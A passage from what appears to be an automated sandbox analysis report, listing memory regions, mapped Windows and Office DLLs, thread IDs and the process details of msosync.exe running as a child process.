region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2330
start_va = 0x4240000
end_va = 0x4242fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004240000"
filename = ""
Region:
id = 2331
start_va = 0x5500000
end_va = 0x5565fff
entry_point = 0x5500000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 2332
start_va = 0x11660000
end_va = 0x11e5ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000011660000"
filename = ""
Region:
id = 2333
start_va = 0x11e60000
end_va = 0x131b4fff
entry_point = 0x11e60000
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll")
Region:
id = 2334
start_va = 0x7fee2d70000
end_va = 0x7fee2d92fff
entry_point = 0x7fee2d70000
region_type = mapped_file
name = "officevoicemanager.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\officevoicemanager.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\officevoicemanager.dll")
Region:
id = 2496
start_va = 0x4240000
end_va = 0x4240fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004240000"
filename = ""
Region:
id = 2497
start_va = 0x7fee2490000
end_va = 0x7fee24e5fff
entry_point = 0x7fee2490000
region_type = mapped_file
name = "msproof7.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msproof7.dll")
Region:
id = 2611
start_va = 0x4270000
end_va = 0x4271fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004270000"
filename = ""
Region:
id = 2612
start_va = 0x4390000
end_va = 0x4391fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004390000"
filename = ""
Region:
id = 2613
start_va = 0x44b0000
end_va = 0x44b1fff
entry_point = 0x0
region_type = private
name = "private_0x00000000044b0000"
filename = ""
Region:
id = 2614
start_va = 0x47c0000
end_va = 0x47c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000047c0000"
filename = ""
Region:
id = 2615
start_va = 0x47e0000
end_va = 0x47e1fff
entry_point = 0x0
region_type = private
name = "private_0x00000000047e0000"
filename = ""
Region:
id = 2616
start_va = 0x5350000
end_va = 0x5351fff
entry_point = 0x0
region_type = private
name = "private_0x0000000005350000"
filename = ""
Region:
id = 2617
start_va = 0x5370000
end_va = 0x5371fff
entry_point = 0x0
region_type = private
name = "private_0x0000000005370000"
filename = ""
Region:
id = 2618
start_va = 0x6190000
end_va = 0x625bfff
entry_point = 0x6190000
region_type = mapped_file
name = "times.ttf"
filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf")
Region:
id = 2619
start_va = 0x62e0000
end_va = 0x62e1fff
entry_point = 0x0
region_type = private
name = "private_0x00000000062e0000"
filename = ""
Region:
id = 2620
start_va = 0x6300000
end_va = 0x6301fff
entry_point = 0x0
region_type = private
name = "private_0x0000000006300000"
filename = ""
Region:
id = 2621
start_va = 0x6320000
end_va = 0x6321fff
entry_point = 0x0
region_type = private
name = "private_0x0000000006320000"
filename = ""
Region:
id = 2622
start_va = 0x6340000
end_va = 0x6341fff
entry_point = 0x0
region_type = private
name = "private_0x0000000006340000"
filename = ""
Region:
id = 2623
start_va = 0x86a0000
end_va = 0x8770fff
entry_point = 0x86a0000
region_type = mapped_file
name = "calibrii.ttf"
filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf")
Region:
id = 2624
start_va = 0x131c0000
end_va = 0x1334cfff
entry_point = 0x131c0000
region_type = mapped_file
name = "cambria.ttc"
filename = "\\Windows\\Fonts\\cambria.ttc" (normalized: "c:\\windows\\fonts\\cambria.ttc")
Region:
id = 2625
start_va = 0x7fee2380000
end_va = 0x7fee2487fff
entry_point = 0x7fee2380000
region_type = mapped_file
name = "msgr8en.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\1033\\msgr8en.dll")
Region:
id = 4560
start_va = 0x2b70000
end_va = 0x2b70fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b70000"
filename = ""
Region:
id = 4561
start_va = 0x2b80000
end_va = 0x2b80fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b80000"
filename = ""
Region:
id = 4562
start_va = 0x2b90000
end_va = 0x2b90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b90000"
filename = ""
Region:
id = 4563
start_va = 0x2ba0000
end_va = 0x2ba0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ba0000"
filename = ""
Region:
id = 4564
start_va = 0x2bb0000
end_va = 0x2be1fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bb0000"
filename = ""
Region:
id = 4565
start_va = 0x4250000
end_va = 0x4250fff
entry_point = 0x4250000
region_type = mapped_file
name = "msgr8en.dub"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.dub")
Region:
id = 4566
start_va = 0x69d0000
end_va = 0x6acffff
entry_point = 0x0
region_type = private
name = "private_0x00000000069d0000"
filename = ""
Region:
id = 4567
start_va = 0x10e10000
end_va = 0x111c1fff
entry_point = 0x0
region_type = private
name = "private_0x0000000010e10000"
filename = ""
Region:
id = 4568
start_va = 0x13350000
end_va = 0x13e99fff
entry_point = 0x13350000
region_type = mapped_file
name = "msgr8en.lex"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.lex")
Region:
id = 4569
start_va = 0x13ee0000
end_va = 0x13fdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000013ee0000"
filename = ""
Region:
id = 4570
start_va = 0x13fe0000
end_va = 0x1446cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000013fe0000"
filename = ""
Region:
id = 4571
start_va = 0x7fef92c0000
end_va = 0x7fef92cefff
entry_point = 0x7fef92c0000
region_type = mapped_file
name = "wordcnvpxy.cnv"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files\\microsoft office\\root\\office16\\wordcnvpxy.cnv")
Region:
id = 4572
start_va = 0x7fef9290000
end_va = 0x7fef92b8fff
entry_point = 0x7fef9290000
region_type = mapped_file
name = "msconv97.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\msconv97.dll")
Region:
id = 4573
start_va = 0x7fef92c0000
end_va = 0x7fef92cffff
entry_point = 0x7fef92c0000
region_type = mapped_file
name = "recovr32.cnv"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\RECOVR32.CNV" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\recovr32.cnv")
Region:
id = 4574
start_va = 0x7fef9270000
end_va = 0x7fef92c4fff
entry_point = 0x7fef9270000
region_type = mapped_file
name = "wpft632.cnv"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\WPFT632.CNV" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\wpft632.cnv")
Region:
id = 4575
start_va = 0x2b60000
end_va = 0x2b63fff
entry_point = 0x2b60000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4576
start_va = 0xfa40000
end_va = 0xfb3ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000fa40000"
filename = ""
Region:
id = 4577
start_va = 0x7fef3090000
end_va = 0x7fef316bfff
entry_point = 0x7fef3090000
region_type = mapped_file
name = "unidrvui.dll"
filename = "\\Windows\\System32\\spool\\drivers\\x64\\3\\UniDrvUI.dll" (normalized: "c:\\windows\\system32\\spool\\drivers\\x64\\3\\unidrvui.dll")
Region:
id = 4578
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 4581
start_va = 0x2bf0000
end_va = 0x2bf1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002bf0000"
filename = ""
Region:
id = 4582
start_va = 0x7fef2f00000
end_va = 0x7fef2f6dfff
entry_point = 0x7fef2f00000
region_type = mapped_file
name = "mso.frameprotocolwin32.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSO.FRAMEPROTOCOLWIN32.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mso.frameprotocolwin32.dll")
Thread:
id = 1
os_tid = 0x984
Thread:
id = 2
os_tid = 0x978
Thread:
id = 3
os_tid = 0x970
Thread:
id = 4
os_tid = 0x968
Thread:
id = 5
os_tid = 0x958
Thread:
id = 6
os_tid = 0x954
Thread:
id = 7
os_tid = 0x950
Thread:
id = 8
os_tid = 0x94c
Thread:
id = 9
os_tid = 0x948
Thread:
id = 10
os_tid = 0x944
Thread:
id = 11
os_tid = 0x940
Thread:
id = 12
os_tid = 0x93c
Thread:
id = 13
os_tid = 0x938
Thread:
id = 14
os_tid = 0x934
Thread:
id = 15
os_tid = 0x930
Thread:
id = 16
os_tid = 0x92c
Thread:
id = 17
os_tid = 0x928
Thread:
id = 18
os_tid = 0x908
Thread:
id = 19
os_tid = 0x904
Thread:
id = 20
os_tid = 0x900
Thread:
id = 21
os_tid = 0x8f8
Thread:
id = 22
os_tid = 0x8f4
Thread:
id = 23
os_tid = 0x8f0
Thread:
id = 24
os_tid = 0x9c8
Thread:
id = 25
os_tid = 0x9cc
Thread:
id = 26
os_tid = 0x9d0
Thread:
id = 27
os_tid = 0x9d4
Thread:
id = 28
os_tid = 0x9d8
Thread:
id = 29
os_tid = 0x9dc
Thread:
id = 30
os_tid = 0x9e0
Thread:
id = 33
os_tid = 0x9f4
Thread:
id = 61
os_tid = 0xb24
Thread:
id = 62
os_tid = 0xb28
Thread:
id = 63
os_tid = 0xb2c
Thread:
id = 66
os_tid = 0xb78
Thread:
id = 67
os_tid = 0xb90
Thread:
id = 214
os_tid = 0x9a4
Thread:
id = 326
os_tid = 0x69c
Thread:
id = 419
os_tid = 0x334
Process:
id = "2"
image_name = "msosync.exe"
filename = "c:\\program files\\microsoft office\\root\\office16\\msosync.exe"
page_root = "0x3ead8000"
os_pid = "0x9e4"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0x8ec"
cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\MsoSync.exe\""
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 456
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 457
start_va = 0xb0000
end_va = 0x1affff
entry_point = 0x0
region_type = private
name = "private_0x00000000000b0000"
filename = ""
Region:
id = 458
start_va = 0x77c40000
end_va = 0x77de8fff
entry_point = 0x77c40000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 459
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 460
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 461
start_va = 0x13f780000
end_va = 0x13f807fff
entry_point = 0x13f780000
region_type = mapped_file
name = "msosync.exe"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSOSYNC.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msosync.exe")
Region:
id = 462
start_va = 0x7fefff60000
end_va = 0x7fefff60fff
entry_point = 0x7fefff60000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 463
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 464
start_va = 0x7fffffd4000
end_va = 0x7fffffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 465
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 466
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 467
start_va = 0x40000
end_va = 0x41fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 468
start_va = 0x50000
end_va = 0x51fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 469
start_va = 0x360000
end_va = 0x45ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 470
start_va = 0x77b20000
end_va = 0x77c3efff
entry_point = 0x77b20000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 471
start_va = 0x13f810000
end_va = 0x13f810fff
entry_point = 0x0
region_type = private
name = "private_0x000000013f810000"
filename = ""
Region:
id = 472
start_va = 0x7fefdd60000
end_va = 0x7fefddcafff
entry_point = 0x7fefdd60000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 473
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 474
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 475
start_va = 0x1b0000
end_va = 0x216fff
entry_point = 0x1b0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 476
start_va = 0x77a20000
end_va = 0x77b19fff
entry_point = 0x77a20000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 477
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 478
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 479
start_va = 0x7fef8370000
end_va = 0x7fef8559fff
entry_point = 0x7fef8370000
region_type = mapped_file
name = "c2r64.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll")
Region:
id = 480
start_va = 0x7fef8560000
end_va = 0x7fef8799fff
entry_point = 0x7fef8560000
region_type = mapped_file
name = "appvisvsubsystems64.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll")
Region:
id = 481
start_va = 0x7fefaa80000
end_va = 0x7fefaa82fff
entry_point = 0x7fefaa80000
region_type = mapped_file
name = "api-ms-win-crt-utility-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll")
Region:
id = 482
start_va = 0x7fefaa90000
end_va = 0x7fefaa92fff
entry_point = 0x7fefaa90000
region_type = mapped_file
name = "api-ms-win-crt-environment-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll")
Region:
id = 483
start_va = 0x7fefaaa0000
end_va = 0x7fefaaa2fff
entry_point = 0x7fefaaa0000
region_type = mapped_file
name = "api-ms-win-crt-filesystem-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll")
Region:
id = 484
start_va = 0x7fefaab0000
end_va = 0x7fefaab2fff
entry_point = 0x7fefaab0000
region_type = mapped_file
name = "api-ms-win-crt-time-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll")
Region:
id = 485
start_va = 0x7fefaac0000
end_va = 0x7fefaac4fff
entry_point = 0x7fefaac0000
region_type = mapped_file
name = "api-ms-win-crt-multibyte-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll")
Region:
id = 486
start_va = 0x7fefaad0000
end_va = 0x7fefaad4fff
entry_point = 0x7fefaad0000
region_type = mapped_file
name = "api-ms-win-crt-math-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll")
Region:
id = 487
start_va = 0x7fefaae0000
end_va = 0x7fefaae2fff
entry_point = 0x7fefaae0000
region_type = mapped_file
name = "api-ms-win-crt-locale-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll")
Region:
id = 488
start_va = 0x7fefaaf0000
end_va = 0x7fefab8bfff
entry_point = 0x7fefaaf0000
region_type = mapped_file
name = "msvcp140.dll"
filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll")
Region:
id = 489
start_va = 0x7fefab90000
end_va = 0x7fefab93fff
entry_point = 0x7fefab90000
region_type = mapped_file
name = "api-ms-win-crt-convert-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")
Region:
id = 490
start_va = 0x7fefaba0000
end_va = 0x7fefaba3fff
entry_point = 0x7fefaba0000
region_type = mapped_file
name = "api-ms-win-crt-stdio-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")
Region:
id = 491
start_va = 0x7fefabb0000
end_va = 0x7fefabb2fff
entry_point = 0x7fefabb0000
region_type = mapped_file
name = "api-ms-win-crt-heap-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")
Region:
id = 492
start_va = 0x7fefabc0000
end_va = 0x7fefabc3fff
entry_point = 0x7fefabc0000
region_type = mapped_file
name = "api-ms-win-crt-string-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")
Region:
id = 493
start_va = 0x7fefabd0000
end_va = 0x7fefabd2fff
entry_point = 0x7fefabd0000
region_type = mapped_file
name = "api-ms-win-core-file-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")
Region:
id = 494
start_va = 0x7fefabe0000
end_va = 0x7fefabe2fff
entry_point = 0x7fefabe0000
region_type = mapped_file
name = "api-ms-win-core-processthreads-l1-1-1.dll"
filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")
Region:
id = 495
start_va = 0x7fefabf0000
end_va = 0x7fefabf2fff
entry_point = 0x7fefabf0000
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 496
start_va = 0x7fefac00000
end_va = 0x7fefac02fff
entry_point = 0x7fefac00000
region_type = mapped_file
name = "api-ms-win-core-localization-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")
Region:
id = 497
start_va = 0x7fefac10000
end_va = 0x7fefac12fff
entry_point = 0x7fefac10000
region_type = mapped_file
name = "api-ms-win-core-file-l2-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")
Region:
id = 498
start_va = 0x7fefac20000
end_va = 0x7fefac22fff
entry_point = 0x7fefac20000
region_type = mapped_file
name = "api-ms-win-core-timezone-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")
Region:
id = 499
start_va = 0x7fefac30000
end_va = 0x7fefad21fff
entry_point = 0x7fefac30000
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 500
start_va = 0x7fefad30000
end_va = 0x7fefad33fff
entry_point = 0x7fefad30000
region_type = mapped_file
name = "api-ms-win-crt-runtime-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")
Region:
id = 501
start_va = 0x7fefad40000
end_va = 0x7fefad55fff
entry_point = 0x7fefad40000
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")
Region:
id = 502
start_va = 0x7fefcf30000
end_va = 0x7fefcf4dfff
entry_point = 0x7fefcf30000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 503
start_va = 0x7fefdb90000
end_va = 0x7fefdb9efff
entry_point = 0x7fefdb90000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 504
start_va = 0x7fefdf60000
end_va = 0x7fefdfc6fff
entry_point = 0x7fefdf60000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 505
start_va = 0x7fefdfd0000
end_va = 0x7fefed57fff
entry_point = 0x7fefdfd0000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 506
start_va = 0x7feff0e0000
end_va = 0x7feff1bafff
entry_point = 0x7feff0e0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 507
start_va = 0x7feff1c0000
end_va = 0x7feff1defff
entry_point = 0x7feff1c0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 508
start_va = 0x7feff4d0000
end_va = 0x7feff598fff
entry_point = 0x7feff4d0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 509
start_va = 0x7feff5a0000
end_va = 0x7feff63efff
entry_point = 0x7feff5a0000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 510
start_va = 0x7feff640000
end_va = 0x7feff6b0fff
entry_point = 0x7feff640000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 511
start_va = 0x7feff860000
end_va = 0x7feff86dfff
entry_point = 0x7feff860000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 512
start_va = 0x7feffa40000
end_va = 0x7feffc42fff
entry_point = 0x7feffa40000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 513
start_va = 0x7feffc50000
end_va = 0x7feffd7cfff
entry_point = 0x7feffc50000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 514
start_va = 0x7feffd80000
end_va = 0x7feffe56fff
entry_point = 0x7feffd80000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 515
start_va = 0x60000
end_va = 0x60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 516
start_va = 0x70000
end_va = 0x70fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 517
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 518
start_va = 0x90000
end_va = 0x96fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000090000"
filename = ""
Region:
id = 519
start_va = 0xa0000
end_va = 0xa1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000a0000"
filename = ""
Region:
id = 520
start_va = 0x2a0000
end_va = 0x2affff
entry_point = 0x0
region_type = private
name = "private_0x00000000002a0000"
filename = ""
Region:
id = 521
start_va = 0x460000
end_va = 0x55ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 522
start_va = 0x560000
end_va = 0x6e7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 523
start_va = 0x6f0000
end_va = 0x870fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006f0000"
filename = ""
Region:
id = 524
start_va = 0x880000
end_va = 0x1c7ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000880000"
filename = ""
Region:
id = 525
start_va = 0x1c80000
end_va = 0x1f4efff
entry_point = 0x1c80000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 526
start_va = 0x1f50000
end_va = 0x2342fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f50000"
filename = ""
Region:
id = 527
start_va = 0x37c80000
end_va = 0x37c8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000037c80000"
filename = ""
Region:
id = 528
start_va = 0x7fefed60000
end_va = 0x7fefed8dfff
entry_point = 0x7fefed60000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 529
start_va = 0x7feff1e0000
end_va = 0x7feff2e8fff
entry_point = 0x7feff1e0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 530
start_va = 0x7febdd50000
end_va = 0x7febdd5ffff
